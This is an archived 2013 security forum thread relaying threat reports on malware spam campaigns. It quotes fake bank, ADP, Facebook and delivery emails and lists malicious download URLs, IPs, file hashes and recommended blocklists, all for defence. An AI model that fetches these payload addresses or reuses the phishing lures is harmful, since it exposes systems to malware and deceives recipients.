PDA

View Full Version : SPAM frauds, fakes, and other MALWARE deliveries...



Pages : 1 [2] 3 4 5 6

AplusWebMaster
2013-08-13, 13:33
FYI...

Malware sites to block 13/8/13
- http://blog.dynamoo.com/2013/08/malware-sites-to-block-13813.html
13 August 2013 - "These IPs and domains belong to this gang* and this list follows on from the one I made last week**..."
(Long list of IPs at the dynamoo URL above.)
* http://blog.dynamoo.com/search/label/Amerika

** http://blog.dynamoo.com/2013/08/malware-sites-to-block-6813.html
___

Pharma sites to block
- http://blog.dynamoo.com/2013/08/pharma-sites-to-block.html
13 August 2013 - "These fake pharma sites and IPs seem related to these malware domains*, and follows on from this list last week**..."
(Long list at the dynamoo URL above.)
* http://blog.dynamoo.com/2013/08/malware-sites-to-block-13813.html

** http://blog.dynamoo.com/2013/08/pharma-sites-to-block-6813.html
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Unpaid Debt Invoice Email Messages - 2013 Aug 13
Malicious Attachment Email Messages - 2013 Aug 12
Fake Money Transfer Notification Email Messages - 2013 Aug 12
Fake Account Payment Notification Email Messages - 2013 Aug 12
Fake Product Order Notification Email Messages - 2013 Aug 12
Fake Package Delivery Failure Notification Email Messages - 2013 Aug 12
Fake Payment Notification Email Messages - 2013 Aug 12
Fake Bank Details Reconfirmation Email Messages - 2013 Aug 12
Fake Documents Attachment Email Messages - 2013 Aug 12
Fake Portuguese Electrical Equipment Invoice Notification Email Messages - 2013 Aug 12
Fake Bank Payment Transfer Notification Email Messages - 2013 Aug 12
Fake Banking Account Information Email Messages - 2013 Aug 12
(More detail and links at the cisco URL above.)
___

LinkedIn Connection Spam
- http://threattrack.tumblr.com/post/58154197039/linkedin-connection-spam
Aug. 13, 2013 - "Subjects Seen:
Invitation to connect on LinkedIn
Typical e-mail details:
<removed> wants to connect with you on LinkedIn.

Malicious URLs
bobbiler.corewaysolution .com/images/wp-gdt.php?x95S4F4MY33PRBG0W
sharperspill .biz/closest/i9jfuhioejskveohnuojfir.php

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/13ed45df65f2af6e95bfea2edb9ea921/tumblr_inline_mrh6bwqsx91qz4rgp.png
___

CNN Breaking News Rehtaeh Parsons Spam
- http://threattrack.tumblr.com/post/58154735687/cnn-breaking-news-rehtaeh-parsons-spam
Aug. 13, 2013 - "Subjects Seen:
CNN: ” Canadian teenager Rehtaeh Parsons”
Typical e-mail details:
2 face charges in case of Canadian girl who hanged self after alleged rape
Canadian teenager Rehtaeh Parsons
Two 18-year-old men face child pornography charges in connection with the case of a 17-year-old girl who hanged herself after she was allegedly gang-raped and bullied online, Canadian authorities said Thursday evening. Full story »

Malicious URLs
retailers.truelinkswear .com/rundown/index.html
dp56148868.lolipop .jp/numeracy/index.html
ftp(DOT)equinejournal .com/apogee/index.html
ead-togo .com/croons/index.html
guterprotectionperfection .com/topic/able_disturb_planning.php

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/855def800a17058b6a6b61ca991cad41/tumblr_inline_mrh6o3wH431qz4rgp.png
___

Fake Bank of America SPAM / Instructions Secured E-mail.zip
- http://blog.dynamoo.com/2013/08/bank-of-american-spam-instructions.html
13 August 2013 - "This fake Bank of America spam has a malicious attachment:
Date: Tue, 13 Aug 2013 09:35:13 -0500 [10:35:13 EDT]
From: "Alphonso.Wilcox" [Alphonso.Wilcox @bankofamerica .com]
Subject: Instructions Secured E-mail.pdf
I will be forwarding the application through a secure e-mail. Attached are instructions for you to create a password to open the secure e-mails from us. Just a bit of security for when we transmit confidential information.
Thanks,
Amado.Underwood
Bank of America
Principal Business Relationship Manager...

Attached to the message is a file Instructions Secured E-mail.zip which contains an executable file Instructions Secured E-mail.exe with an icon to make it look like a PDF file.
The detection rate for this initial malware is just 9/45 at VirusTotal**.
This is a pony/gate downloader which attempts to download from [donotclick]guterprotectionperfection.com/ponyb/gate.php on 192.81.135.132 (Linode, US). This is the same IP as used in this attack*, and it also utilises a -hijacked- GoDaddy domain.
The download then attempts to download a second stage from the from the following locations (as well as installing all sorts of hooks into your system):
[donotclick]Missionsearchjobs .com/D5F7G.exe
[donotclick]betterbacksystems .com/kvq.exe
[donotclick]www.printdirectadvertising .com/vfMJH.exe
[donotclick]S381195155.onlinehome .us/vmkCQg8N.exe
The second stage has an even lower detection rate of just 3/45*** ...
Recommended blocklist:
192.81.135.132
guterprotectionperfection .com
Missionsearchjobs .com
betterbacksystems .com
www .printdirectadvertising .com
S381195155.onlinehome .us "
* http://blog.dynamoo.com/2013/08/facebook-spam-guterhelmetcom.html

** https://www.virustotal.com/en-gb/file/f26a77b7df7f2f796ffd3961ed1fd48cc3b27629925f583812b2cee9dcd22177/analysis/1376406778/

*** https://www.virustotal.com/en-gb/file/0aa6884451982533ebf8d62c258182452966a8d24e43d3396fe2b4c8f94fff81/analysis/1376407672/

:fear: :mad:

AplusWebMaster
2013-08-14, 15:12
FYI...

Bogus Firefox updates
- https://net-security.org/malware_news.php?id=2559
Aug. 13, 2013 - "A series of Internet campaigns pushing bogus Firefox updates onto unwary users have been spotted by researchers, and among them is one that lures them in through “Green Card Lottery” ads... According to ThreatTrack's analysis*, the website is capable of detecting which browser the user uses and to recommend an update for it. Nevertheless, the offered "update" is always the same: Firefox v13 (long outdated - the current version is 23), with several "add-ons, adware, toolbars and other malicious and irritating accompaniments" also trying to get installed via the installation wizard:
> http://www.net-security.org/images/articles/tt-13082013.jpg
Among this tag-along software is the Delta Toolbar, Webcake (a browser add-on that, among other things, serves ads), Optimizer Pro (a questionable PC-tune-up program), QuickShare (a deceptive browser plugin that steals data and redirects to unwanted websites) and an ad for “unlimited cloud storage”. All this "crapware" is sure to bring grief to the victims. It will slow down their computer, for sure, but the biggest problem is that they will end up with a outdated browser that can be successfully targeted with drive-by-download schemes, more additional malware and they will likely become victims of identity theft in the long run..."
* http://www.threattracksecurity.com/it-blog/outdated-browser-detected-firefox-update/
___

Malicious Spam Targets Virgin Media Patrons, Consul General
- http://www.threattracksecurity.com/it-blog/malicious-spam-targets-virgin-media-patrons-consul-general/
Aug. 13, 2013 - "... a fresh campaign of malicious spam that purports to originate from various brands and names but delivers the same malicious attachment to recipients. As of this time of writing, the spam is disguised as a mail coming from Virgin Media* and a notification of an expiring car insurance addressed to the Consul General of Suriname**... detections we have for related malicious files form these spam, as of this writing:
- Both compressed files are detected as Trojan.Zip.Bredozp.b (v).
- The uncompressed .EXE files, which are essentially one and the same, is detected as Win32.Malware!Drop.
The file it downloads is malicious, and it changes at random..."
* http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/08/virgin-media-spam.png

** http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/08/car-insurance-spam.png
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Scanned Document Attachment Email Messages - 2013 Aug 14
Fake MMS Notification Email Messages - 2013 Aug 14
Fake Package Delivery Failure Notification Email Messages - 2013 Aug 14
Fake Package Delivery Information Email Messages - 2013 Aug 14
Fake Payment Confirmation Notification Email Messages - 2013 Aug 13
Fake Secure Message Notification Email Messages - 2013 Aug 13
Fake Debt Collection Notice Email Messages - 2013 Aug 13
Malicious Attachment Email Messages - 2013 Aug 13
Fake Account Payment Notification Email Messages - 2013 Aug 13
Fake Product Purchase Order Email Messages - 2013 Aug 13
Fake Xerox Scan Attachment Email Messages - 2013 Aug 13
Fake UPS Parcel Notification Email Messages - 2013 Aug 13
Fake Bank Payment Transfer Notification Email Messages - 2013 Aug 13
Fake Product Services Specification Request Email Messages - 2013 Aug 13
Fake Unpaid Debt Invoice Email Messages - 2013 Aug 13
(More detail and links at the cisco URL above.)
___

Twitter Spam ...
- http://krebsonsecurity.com/2013/08/buying-battles-in-the-war-on-twitter-spam/
Aug 14, 2013 - "The success of social networking community Twitter has given rise to an entire shadow economy that peddles -dummy- Twitter accounts by the thousands, primarily to spammers, scammers and malware purveyors. But new research on identifying bogus accounts has helped Twitter to drastically deplete the stockpile of existing accounts for sale, and holds the promise of driving up costs for both vendors of these shady services and their customers. Twitter prohibits the sale and auto-creation of accounts, and the company routinely suspends accounts created in violation of that policy. But according to researchers from George Mason University and the University of California, Berkeley, Twitter traditionally has done so only -after- these fraudulent accounts have been used to spam and attack legitimate Twitter users..."
(More detail at the krebsonsecurity URL above.)
___

Wells Fargo Important Documents Spam
- http://threattrack.tumblr.com/post/58242338970/wells-fargo-important-documents-spam
Aug. 14, 2013 - "Subjects Seen:
IMPORTANT Documents - WellsFargo
Typical e-mail details:
Please review attached files.
Eleanor_Wyatt
Wells Fargo Advisors
817-246-9671 office

Malicious URLs
gutterprosmaryland .com/forum/viewtopic.php
gutterhelmetleafguardgutterprotection .com/forum/viewtopic.php
gutterguardbuyersguide .com/forum/viewtopic.php
gutterglovegutterprotection .com/forum/viewtopic.php
dp55197480.lolipop .jp/1ayPTHK.exe
roundaboutcellars .com/Utuw1.exe
bbsmfg .biz/VKPqrms.exe
caribbeancinemas .net/MLEYCY9.exe

- https://www.virustotal.com/en/ip-address/64.71.35.14/information/

Malicious File Name and MD5:
DOC_<e-mail>.zip (B1342413F0AEE3E6440453689D26803B)
DOC_{_MAILTO_USERNAME}.exe (ABAFB7DA0F23112064F6BC3A1F93DDF6)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/058ad51983943283c252add34ea3da0b/tumblr_inline_mriyb83O4Y1qz4rgp.png
___

Fake ADP SPAM / hubbywifeburgers .com
- http://blog.dynamoo.com/2013/08/adp-spam-hubbywifeburgerscom.html
14 Aug 2013 - "This fake ADP spam leads to malware on hubbywifeburgers .com:
Date: Wed, 14 Aug 2013 08:58:12 -0700 [11:58:12 EDT]
From: "ADPClientServices @adp .com" [service @citibank .com]
Subject: ADP Security Management Update
ADP Security Management Update
Reference ID: 39866
Dear ADP Client August 2013
This message is to inform you of the upcoming �Phase 2� enhancement to ADP Security Management (formally ADP Netsecure). This is where you manage your users� access to ADP�s Internet services, and includes the self-service registration process.
Effective August 15th, ADP Security Management will reflect a new user interface. This will include tasks such as Account Maintenance, User Maintenance, and Company Maintenance within Security Management.
Please review the following information:
� Click here to view more details of the enhancements in Phase 2
� Complete the What�s New in Security Management Service here (Expected to take about 15 minutes)... The information contained in this email is intended only for the individual(s) addressed in this message and may contain privileged and/or confidential information that is exempt from disclosure under applicable law.

Screenshot: https://lh3.ggpht.com/-33hn5xJdiRw/UgvV5vzDLkI/AAAAAAAABxM/-IcZiCFuBLo/s1600/adp-spam2.png

Yeah.. click the link. What could possibly go wrong? Well, first you go to a legitimate -hacked- site that tried to load one of the following three scripts:
[donotclick]e-equus.kei .pl/perusing/cassie.js
[donotclick]cncnc .biz/pothooks/addict.js
[donotclick]khalidkala .com/immigration/unkind.js
From there, the victim is sent to a malware site that uses a -hijacked- GoDaddy domain at [donotclick]hubbywifeburgers .com/topic/nearby-promptly.php hosted on 199.195.116.51 (A2 Hosting, US - report here*). This IP probably contains other hijacked domains from the same owner.
Recommended blocklist:
199.195.116.51
hubbywifeburgers .com
e-equus.kei .pl
cncnc .biz
khalidkala .com "
* https://www.virustotal.com/en/ip-address/199.195.116.51/information/

:mad: :fear::fear:

AplusWebMaster
2013-08-15, 17:16
FYI...

Something evil on 162.211.231.16
- http://blog.dynamoo.com/2013/08/something-evil-on-16221123116.html
15 August 2013 - "The server at 162.211.231.16 (IT7 Networks, Canada) is currently being used in injection attacks (example*) which have been going on for some time [1] [2] and uses several domains... All the domains are very recently registered by GoDaddy. The WHOIS details for brigitteunderwear .com (also registered by GoDaddy in 2006) are consistent, but I've seen enough hijacked GoDaddy domains recently to be suspicious that there could be an element of identity theft here, and the named person may well have nothing to do with this attack. I haven't had time to poke around at the payload too much, but this could well be a good IP to block, or alternatively use the list of domains that I have identified below (it may not be comprehensive, though)
Recommended blocklist:
162.211.231.16 ..."
(Long list at the dynamoo URL above.)
* http://urlquery.net/report.php?id=4568967

1] https://www.virustotal.com/en-gb/ip-address/162.211.231.16/information/

2] http://urlquery.net/search.php?q=162.211.231.16&type=string&start=2013-07-31&end=2013-08-15&max=50
___

Fake "INCOMING FAX REPORT" SPAM / chellebelledesigns .com
- http://blog.dynamoo.com/2013/08/incoming-fax-report-spam.html
15 August 2013 - "A facsimile transmission. How quaint. Of course, it isn't.. the link in the spam goes to a malicious page on chellebelledesigns .com:
From: Administrator [administrator @victimdomain]
Date: 15 August 2013 16:08
Subject: INCOMING FAX REPORT : Remote ID: 1043524020
***********************INCOMINGFAXREPORT*****************
INCOMING FAX REPORT
*********************************************************
Date/Time: 07/25/2013 02:12:11 EST
Speed: 66387 bps
Connection time: 04:06
Pages: 0
Resolution: Normal
Remote ID: 1043524020
Line number: 7
DTMF/DID:
Description: June Payroll
Click here to view the file online
*********************************************************

Note that the spam appears to come "from" the "Administrator" in the victim's own domain. This email address is a forgery, so don't worry about it. If you are daft enough to click the link in the email you go to a legitimate -hacked- site and then on to one of three scripts:
[donotclick]millionaireheaven .com/mable/rework.js
[donotclick]pettigrew .us/airheads/testier.js
[donotclick]www .situ-ingenieurgeologie .de/tuesday/alleviation.js
from there on, the victim is forwarded to a malicious landing page at [donotclick]chellebelledesigns .com/topic/conclusion-western.php using a hacked GoDaddy domain on 173.246.104.55 (Gandi, US). There are other hijacked GoDaddy domains on the same server...
Recommended blocklist:
173.246.104.55 ..."
(More domains listed at the dynamoo URL above.)

- https://www.virustotal.com/en/ip-address/173.246.104.55/information/
___

UPS Quantum View Spam
- http://threattrack.tumblr.com/post/58338584106/ups-quantum-view-spam
Aug. 15, 2013 - "Subjects Seen:
UPS - Your package is available for pickup ( Parcel <random> )
Typical e-mail details:
You may pickup the parcel at our post office.
Please attention!
For mode details and shipping label please see the attached file.
Print this label to get this package at our post office.
Please do not reply to this e-mail, it is an unmonitored mailbox!
Thank you,
UPS Logistics Services.

Malicious URLs
chellebelledesigns .com/ponyb/gate.php
1800callabe .com/ponyb/gate.php
abemoussa .com/ponyb/gate.php
keralahouseboatstourpackages .com/FXx.exe

Malicious File Name and MD5:
UPS-Label_<random>.zip (607F7CBD6CEF3DDD5F5DB88612FC91B6)
UPS-Label_<date>.exe
(782D6C5633D139704221E927782195E0)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4cbd61e5297fb8ae3aeb8970fb72312e/tumblr_inline_mrkyb1P4hG1qz4rgp.png

:fear: :mad:

AplusWebMaster
2013-08-16, 20:09
FYI...

Fake ADP SPAM / ADP_week_invoice.zip|exe
- http://blog.dynamoo.com/2013/08/adp-spam-adpweekinvoicezipexe.html
16 August 2013 - "This fake ADP spam has a malicious attachment:
Date: Fri, 16 Aug 2013 09:57:59 -0500 [10:57:59 EDT]
From: "run.payroll.invoice @adp .com" [run.payroll.invoice @adp .com]
Subject: ADP Payroll INVOICE for week ending 08/16/2013
Your ADP Payroll invoice for last week is attached for your review. If you have any
questions regarding this invoice, please contact your ADP service team at the number
provided on the invoice for assistance.
Thank you for choosing ADP Payroll.
Important: Please do not respond to this message. It comes from an unattended mailbox.

There is an attachment ADP_week_invoice.zip which in turn contains a malicious executable file ADP_week_invoice.exe. The payload is exactly the same as this* other malicious spam run which is running in parallel."
* http://blog.dynamoo.com/2013/08/ceo-portal-statements-notices-event.html

ADP Payroll Invoice Spam
- http://threattrack.tumblr.com/post/58422233895/adp-payroll-invoice-spam
16 August 2013 - "Subjects Seen:
ADP Payroll INVOICE for week ending 08/16/2013
Typical e-mail details:
Your ADP Payroll invoice for last week is attached for your review. If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.
Thank you for choosing ADP Payroll.

Malicious URLs
hubbywifeco .com/forum/viewtopic.php
hubbywifedesigns .com/forum/viewtopic.php
hubbywifedesserts .com/forum/viewtopic.php
hubbywifefoods .com/forum/viewtopic.php
208.106.130.52 /39UvZmv.exe
demoscreactivo .com/DKM9.exe
roundaboutcellars .com/Utuw1.exe
bbsmfg.biz/VKPqrms .exe
cccustomerctr .com/39UvZmv.exe

Malicious File Name and MD5:
ADP_week_invoice.zip (8C67BC641A95379867C4B9EBAE68446A)
ADP_week_invoice.exe
(6EBF2EA3DB16B3E912068D0A9E33320E)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/ce1dfc0558b95edf50e52a843b3ae948/tumblr_inline_mrmold4lru1qz4rgp.png
___

Fake Wells Fargo SPAM "CEO Portal Statements & Notices Event" -report_{DIGIT[12]}.exe
- http://blog.dynamoo.com/2013/08/ceo-portal-statements-notices-event.html
16 August 2013 - "This fake Wells Fargo email has a malicious attachment:
Date: Fri, 16 Aug 2013 09:51:17 -0500 [10:51:17 EDT]
From: Wells Fargo Event Messaging Admin [ofsrep.ceosmuigw @wellsfargo .com]
Subject: CEO Portal Statements & Notices Event
Wells Fargo
Commercial Electronic Office (CEO) Portal Statements & Notices Event: Multiple Download Request Available
Your Deposit Adjustment Notices is now available. To access your information please download attached report and open Statements & Notices file.
Date/Time Stamp: Fri, 16 Aug 2013 09:51:17 -0500
Request Name: MM3P85NRLOXLOFJ
Event Message ID: S045-77988311
Please do not reply to this email.

The email has an attachment called report_625859705821.zip which in turn contains an exectuable report_{DIGIT[12]}.exe (which presumably is an error) which has a VirusTotal detection rate of 9/46*. The Malwr report shows that this malware does various things**, inclding an HTTP request to a hijacked GoDaddy domain at [donotclick]hubbywifeco .com/forum/viewtopic.php hosted on 66.151.138.80 (Nuclear Fallout Enterprises, US) which is shared with another -hijacked- domain, hubbywifecakes .com.
From there, another executable is downloaded from one of the following locations:
[donotclick]208.106.130.52 /39UvZmv.exe
[donotclick]demoscreactivo .com/DKM9.exe
[donotclick]roundaboutcellars .com/Utuw1.exe
[donotclick]bbsmfg .biz/VKPqrms.exe
This executable has an even lower detection rate of just 5/46***... Blocking EXE-in-ZIP files like this at your perimeter is an excellent idea if you can do it.
Recommended blocklist:
66.151.138.80
hubbywifeco .com
hubbywifecakes .com
208.106.130.52
demoscreactivo .com
roundaboutcellars .com
bbsmfg .biz "
*
https://www.virustotal.com/en-gb/file/a2fec44b5bc4abdb7c21589a107e379b49f7b4e559d16a1a4bcd6d06ceacfbea/analysis/1376665654/

** https://malwr.com/analysis/NjAxNGMwYmRiMWNjNDIzMDhlMmIxMjgwYmJlMWY3YzU/

*** https://www.virustotal.com/en-gb/file/1ba0ee97381c7e26589f56a8e45212c784ccfc41b9bb57eb783964be5afb49c9/analysis/1376666041/

- https://www.virustotal.com/en-gb/ip-address/66.151.138.80/information/

- https://www.virustotal.com/en-gb/ip-address/208.106.130.52/information/

:mad::fear::sad:

AplusWebMaster
2013-08-19, 13:27
FYI...

Malware sites to block 19/8/13
- http://blog.dynamoo.com/2013/08/malware-sites-to-block-19813.html
19 August 2013 - "These sites and IPs belong to this gang*, and this list follows one from this one**..."
(Long list of IPs at the dynamoo URL above.)
* http://blog.dynamoo.com/search/label/Amerika

** http://blog.dynamoo.com/2013/08/malware-sites-to-block-13813.html
___

Fake Facebook SPAM / hubbywifewines .com
- http://blog.dynamoo.com/2013/08/facebook-spam-hubbywifewinescom.html
19 August 2013 - "This fake Facebook spam leads to malware on hubbywifewines .com:
Date: Mon, 19 Aug 2013 16:20:06 +0200 [10:20:06 EDT]
From: Facebook [update+hiehdzge @facebookmail .com]
Subject: You requested a new Facebook password
facebook
Hello,
You recently asked to reset your Facebook password.
Click here to change your password.
Didn't request this change?
If you didn't request a new password, let us know immediately.
Change Password
This message was sent to [redacted].net at your request.
Facebook, Inc., Attention: Department 415, PO Box 10005, Palo Alto, CA 94303

The link in the email goes to a legitimate -hacked- site and then loads one or more of these three scripts:
[donotclick]ftp.hotwindsaunausa .com/clingy/concord.js
[donotclick]katchthedeal .sg/stilling/rifts.js
[donotclick]ftp.navaglia .it/gazebo/cowboys.js
The victim is then forwarded to a malware landing page using a hijacked GoDaddy domain at [donotclick]hubbywifewines .com/topic/able_disturb_planning.php hosted on 72.5.102.192* (Nuclear Fallout Enterprises, US) along with another hijacked domain of hubbywifefoods .com
Recommended blocklist:
72.5.102.192
hubbywifewines .com
hubbywifefoods .com
ftp.hotwindsaunausa .com
katchthedeal .sg
ftp.navaglia .it"
* https://www.virustotal.com/en/ip-address/72.5.102.192/information/
___

Booking.com Confirmation Spam
- http://threattrack.tumblr.com/post/58704894229/booking-com-confirmation-spam
Aug. 19, 2013 - "Subjects Seen:
Confirmation <random>
Typical e-mail details:
BOOKING CONFIRMATION
Issued: 08/18/2013
BEDDING AND INCLUSIONS SHOWN IN ATTACHED FILE
====================================
Confirmation number: <removed>
Booking source: booking.com
(please refer to this brand when
communicating with the guest)
BOOKING SUMMARY
Check in: 29-Aug-2013
Check out: 31-Aug-2013
Total number of rooms: 1 per night
Total number of room nights: 1 (1 room for 1 night each)
Total booking amount: $314.00
Room: 1 Night 1-2 people
Number of guests: Adults: 1 Children: 0
Bedding configuration: One or 2 People
=====Comments=====
Guest comments: non-smoking
Any comments from the guest are by request only and have not been guaranteed...
The guest is also aware that you may require them to provide a security deposit at
check-in to guarantee payment of any incidental charges.
The Team Booking.com

Malicious File Name and MD5:
BOOKING ISSUED 18.Aug.2013.zip (61EE0B0EE92F717D50F42EB0171BAD6E)
BOOKING ISSUED 18.Aug.2013.pdf.exe (948FD2EA728F38886DF824AA2BB7FD3A)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/1f3cac9ae5c582f38bb7352037bd82ff/tumblr_inline_mrsd6ucgl61qz4rgp.png
___

Fake Facebook password SPAM / frankcremascocabinets .com
- http://blog.dynamoo.com/2013/08/you-requested-new-facebook-password.html
19 August 2013 - "This fake Facebook spam follows on from this one*, but has a different malicious landing page at frankcremascocabinets .com:
From: Facebook [update+hiehdzge @facebookmail .com]
Date: 19 August 2013 17:38
Subject: You requested a new Facebook password
facebook
Hello,
You recently asked to reset your Facebook password.
Click here to change your password.
Didn't request this change?
If you didn't request a new password, let us know immediately.
Change Password
This message was sent to [redacted] at your request.
Facebook, Inc., Attention: Department 415, PO Box 10005, Palo Alto, CA 94303

The link in the email goes to a legitimate -hacked- site which then tries to load one or more of the following three scripts:
[donotclick]ftp.hotwindsaunausa .com/clingy/concord.js
[donotclick]katchthedeal .sg/stilling/rifts.js
[donotclick]ftp.navaglia .it/gazebo/cowboys.js
The victim is then directed to a malware payload at [donotclick]frankcremascocabinets .com/topic/able_disturb_planning.php hosted on 184.95.37.102 (Secured Servers, US / Jolly Works Hosting, Philippines). This domain is a hijacked GoDaddy domain and there are several others on the same server...
Recommended blocklist:
184.95.37.96/28
ftp.hotwindsaunausa .com
katchthedeal .sg
ftp.navaglia .it
giuseppepiruzza .com
frankcremascocabinets .com
gordonpoint .biz
hitechcreature .com
frankcremasco .com "
* http://blog.dynamoo.com/2013/08/facebook-spam-hubbywifewinescom.html

- https://www.virustotal.com/en/ip-address/184.95.37.102/information/
___

UK Tax-Themed Spam leads to ZeuS/ZBOT
- http://blog.trendmicro.com/trendlabs-security-intelligence/uk-tax-themed-spam-leads-to-zeuszbot/
Aug 19, 2013 - "Tax-themed spam, particularly in the United States, is already considered a staple in the threat landscape. However, a recent spam run targeting taxpayers in the United Kingdom shows that this threat is never exclusive to a region. Besides being timely, these messages contain TSPY_FAREIT, which download a ZeuS/ZBOT variant, notorious for stealing information related to online banking sites. We found sample of an email message that appears to be from HM Revenue and Customs in the UK. It notifies users of their VAT return receipt, something that might appear timely to unsuspecting users since the deadline for VAT returns and payments was last August 7. To further convince users of its validity, the message states that the email was “scanned for viruses”. Sample spam with alleged VAT return “receipt”:
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/08/Tax-season-uk-spam.jpg
The message contains an attachment, which is supposed to be the receipt for the VAT return. But based on our findings, the attachment is (expectedly) a malware detected as TSPY_FAREIT.ADI. Once executed, the malware steals varied information from the system, such as those related to: FTP clients,file managers, and email... The data stealing does not stop there. TSPY_FAREIT.ADI downloads another malware, specifically TSPY_ZBOT.ADD. As expected of any ZeuS/ZBOT variant, the malware downloads configuration file(s) from randomly generated IP addresses. The said file also contains list of targeted online banking and finance-related sites and the URLs where it sends the gathered information. The cybercriminals behind this threat are obviously taking advantage of the recent tax return deadline in the UK. But the real concern here is the severity of the information to be stolen. Aside from the email and FTP credentials, which are profitable in the underground market, the bad guys are also gunning for the victims’ online banking accounts. Once they got hold of users’ banking and financial credentials, they can either sell them on the digital underground or use these to initiate unauthorized money transfers leading to actual financial loss... we noted the increase of online banking malware in the past quarter and how the CARBERP’s “leaked” source code may lead to more variety for this threat. Thus, it is important for users to double-check the messages they receive and to be careful in opening any attachments from unverified sources. As an added precaution, always implement your systems with the latest security updates from vendors..."
___

Fake Citi SPAM / securedoc.zip
- http://blog.dynamoo.com/2013/08/you-have-received-secure-message-spam.html
19 August 2013 - "This fake Citi spam contains a malicious attachment:
Date: Mon, 19 Aug 2013 20:24:27 +0000 [16:24:27 EDT]
From: "secure.email @citi .com" [secure.email @citi .com]
Subject: You have received a secure message
Read your secure message by opening the attachment, securedoc. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it with Internet Explorer.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Citi Secure Email Help Desk at (866) 535-2504.
First time users - will need to register after opening the attachment...

Attached is a file securedoc.zip which in turn contains a malicious executable securedoc.exe which has a very low detection rate at VirusTotal of just 2/46*. The Malwr analysis** (and also ThreatExpert***) shows that the file first connects to [donotclick]frankcremascocabinets .com/forum/viewtopic.php (a -hijacked- GoDaddy domain on 184.95.37.102 (Secured Servers, US / Jolly Works Hosting, Philippines) as seen before here, and it then tries to downoad additional components from:
[donotclick]lobbyarkansas .com/0d8H.exe
[donotclick]ftp.ixcenter .com/GMMo6.exe
[donotclick]faithful-ftp .com/kFbWXZX.exe
This second part has another very low VirusTotal detection rate of just 3/46****...
Recommened blocklist:
184.95.37.96/28
frankcremascocabinets .com
giuseppepiruzza .com
gordonpoint .biz
gordonpoint .info
hitechcreature .com
frankcremasco .com
lobbyarkansas .com
ftp.ixcenter .com
faithful-ftp .com "
* https://www.virustotal.com/en/file/25ce3d9e23e53300bc0c166c2e6e768554b51b8d169ee8ac6e07ff038125fe61/analysis/1376945701/

** https://malwr.com/analysis/NjcwNGFhOWNjY2Y3NGNhMDgwNDU3NjdhNjk5ZDA1MTI/

*** http://www.threatexpert.com/report.aspx?md5=007da88f903a5c2c4fbf106d28218cf9

**** https://www.virustotal.com/en/file/2807f7c140029c6cb117aa7418f4eac1314fcdaa75d9be16cd26c47ff813f8c7/analysis/1376946672/

:fear::mad:

AplusWebMaster
2013-08-20, 17:02
FYI...

Fake Browser Updates drop Shylock Malware
- http://www.threattracksecurity.com/it-blog/fake-browser-updates-drop-shylock-malware/
August 19, 2013 - "We’re no stranger to fake and often malicious Internet browsers* that are served up on equally fake and malicious Web sites. These latest samples found by... our threat researchers in the AV Labs, are hosted on the domain, browseratrisk(dot)com. It is found that once users access pages on this malicious domain with either Internet Explorer (IE), Firefox or Chrome, it opens a fake “update” page for the said browsers and auto-downloads the fake files. Below are screenshots of these pages:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/08/ff-shylock-wm.jpg
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/08/chrome-shylock-wm.jpg
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/08/ie-shylock-wm.jpg
... Users may find it difficult to close and navigate to other tabs after download, thanks to certain loop commands on the page’s code, which we’ve seen before**. If users choose to install the downloaded fake browser updates, it then drops a variant of either Sirefef or Shylock/Caphaw malware... Win32.Malware!Drop... Shylock had hit the news in January of this year as the banking Trojan capable of using Skype chat to spread. Note that the dropped file may change at roughly every three to four hours. The website server is also known to house Blackhole Exploit kits... If users access browseratrisk(dot)com via their mobile devices and on OSX, they are redirected to FriendFinder, a popular online dating service, via the mirror site, stealthtec(dot)net. When it comes to software updates, it pays to be wary of random sites claiming your current Internet browser needs to be updated. It is best to -ignore- these pages and go straight to official pages..."
* http://www.threattracksecurity.com/it-blog/?s=browser&x=12&y=21

** http://www.threattracksecurity.com/it-blog/fake-critical-browser-update-site-serves-malware/

:mad: :fear:

AplusWebMaster
2013-08-21, 15:47
FYI...

Fake Facebook SPAM / dennissellsgateway .com
- http://blog.dynamoo.com/2013/08/facebook-spam-dennissellsgatewaycom.html
21 August 2013 - "This fake Facebook spam leads to malware on dennissellsgateway .com:
Date: Tue, 20 Aug 2013 15:28:11 -0500 [16:28:11 EDT]
From: Facebook [no-reply @facebook .com]
Subject: Gene Maynard wants to be friends with you on Facebook.
facebook
Gene Maynard wants to be friends with you on Facebook.
University of Houston, Victoria
342 friends - 28 photos
Confirm Request
See All Requests
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future, please click: unsubscribe.
Facebook, Inc. Attention: Department 415 P.O Box 10005 Palo Alto CA 94303

This is a "ThreeScripts" attack, with the link first going to a legitimate -hacked- site and then through one of the following three scripts:
[donotclick]ftp.crimestoppersofpinellas .org/jonson/tried.js
[donotclick]italiangardensomaha .com/moocher/pawned.js
[donotclick]www.it-planet .gr/schlepped/suitor.js
From there, the victim ends up on a -hijacked- GoDaddy domain with a malicious payload at [donotclick]dennissellsgateway .com/topic/able_disturb_planning.php on 72.5.102.146 (Nuclear Fallout Enterprises, US) along with some other hijacked domains...
Recommended blocklist:
72.5.102.146
dennissellsgateway .com
justinreid .us
waterwayrealtyteam .us
www.it-planet .gr
italiangardensomaha .com
ftp.crimestoppersofpinellas .org "

>> Update: Another spam is circulating with a different pitch, but the -same- malicious payload:
Dear Customer,
The following is your Credit Card settlement report for Monday, August 19, 2013.
Transaction Volume Statistics for Settlement Batch dated 19-Aug-2013
Batch ID: 108837538
